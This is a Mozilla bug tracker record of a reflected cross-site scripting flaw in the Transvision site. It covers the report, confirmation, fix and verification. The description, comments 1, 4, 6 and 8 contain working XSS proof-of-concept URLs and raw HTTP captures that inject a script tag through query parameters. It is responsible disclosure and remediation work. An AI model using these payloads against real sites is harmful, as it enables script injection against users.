Closed
Bug 1277512
Opened 8 years ago
Closed 8 years ago
XSS on transvision.mozfr.org
Categories
(Websites :: Other, defect)
Tracking
(Not tracked)
RESOLVED
FIXED
People
(Reporter: griffin.francis.1993, Assigned: pascalc)
References
Details
(Keywords: sec-high, wsec-xss)
User Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 Steps to reproduce: Navigate to the following URL - https://transvision.mozfr.org/?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=1 Actual results: There is a cross-site scripting issue present within a Mozilla France subdomain. Expected results: Code should be sanitized to protect against malicious input.
|
||
Comment 1•8 years ago
|
||
CONFIRMED REQUEST GET /?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=1 HTTP/1.1 Host: transvision.mozfr.org User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: close Upgrade-Insecure-Requests: 1 RESPONSE HTTP/1.1 200 OK Date: Thu, 02 Jun 2016 14:10:37 GMT Server: Apache/2.4.10 (Debian) Transvision-perf: Memory: 20447232 (19.5MB); Time: 0.3413s Cache-Control: max-age=604800 Expires: Thu, 09 Jun 2016 14:10:37 GMT Vary: Accept-Encoding Content-Length: 23159 Connection: close Content-Type: text/html; charset=UTF-8 ...SNIP... <a href="/?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&"><script>alert(1)</script>=1&json=true">af</a> or <a href="/?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&"><script>alert(1)</script>=1&json=true">af</a>. ...SNIP...
|
|
||
Updated•8 years ago
|
Status: UNCONFIRMED → NEW
Ever confirmed: true
|
|
||
Updated•8 years ago
|
|
|
||
Comment 2•8 years ago
|
||
pierros: Including you on this bug because I have you as the community sec PoC. pascal: Including you because I see you're active on the project and fixed previous XSS issues in this application (RE: https://github.com/mozfr/transvision/issues/676).
Flags: needinfo?(pierros)
Flags: needinfo?(pascalc)
|
|
||
Comment 3•8 years ago
|
||
griffin: Thanks as always for your submission. Hope to get someone looking at this soon to fix
|
Assignee | |
Updated•8 years ago
|
Assignee: nobody → pascalc
Flags: needinfo?(pascalc)
|
|
Assignee | |
Comment 4•8 years ago
|
||
Thanks I opened https://github.com/mozfr/transvision/issues/750 and fixed it in https://github.com/mozfr/transvision/commit/96555ab7700c5b008e9c99b073640eee4c43d7d3 our beta site has the patch: https://transvision-beta.mozfr.org/?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=1 I am going to do a patch release now to have the patch on production.
|
|
Assignee | |
Comment 5•8 years ago
|
||
The fix is now on production.
|
|
||
Comment 6•8 years ago
|
||
CONFIRMED PROD FIX REQUEST GET /?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=1 HTTP/1.1 Host: transvision.mozfr.org User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: close Upgrade-Insecure-Requests: 1 RESPONSE HTTP/1.1 200 OK Date: Thu, 02 Jun 2016 16:20:47 GMT Server: Apache/2.4.10 (Debian) Transvision-perf: Memory: 20447232 (19.5MB); Time: 0.3327s Cache-Control: max-age=604800 Expires: Thu, 09 Jun 2016 16:20:47 GMT Vary: Accept-Encoding Content-Length: 23255 Connection: close Content-Type: text/html; charset=UTF-8 ...SNIP... <span>API</span>These results are also available as an API request for <a href="/?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&&#34;&#62;&#60;script&#62;alert(1)&#60;/script&#62;=1&json=true">af</a> or <a href="/?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&&#34;&#62;&#60;script&#62;alert(1)&#60;/script&#62;=1&json=true">af</a>. <br> <a href="https://github.com/mozfr/transvision/wiki/JSON-API">Learn more about the Transvision API</a>. ...SNIP...
Status: NEW → RESOLVED
Closed: 8 years ago
Flags: needinfo?(pierros)
Resolution: --- → FIXED
|
|
||
Comment 7•8 years ago
|
||
Thanks Pascal for the quick reply and action!
|
Reporter | |
Comment 8•8 years ago
|
||
Appears to be fixed. Here is another vulnerable paramter - https://transvision.mozfr.org/?locale=fr&repo=release&recherche=Don%27t&jsonuy1ai%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Erebpy
|
|
||
Comment 9•8 years ago
|
||
Griffin: I'm moving the discussion for the new bug over to Bug #1277857. Thanks for the submission!
|
||
Updated•8 years ago
|
Group: websites-security
You need to log in
before you can comment on or make changes to this bug.
Description
•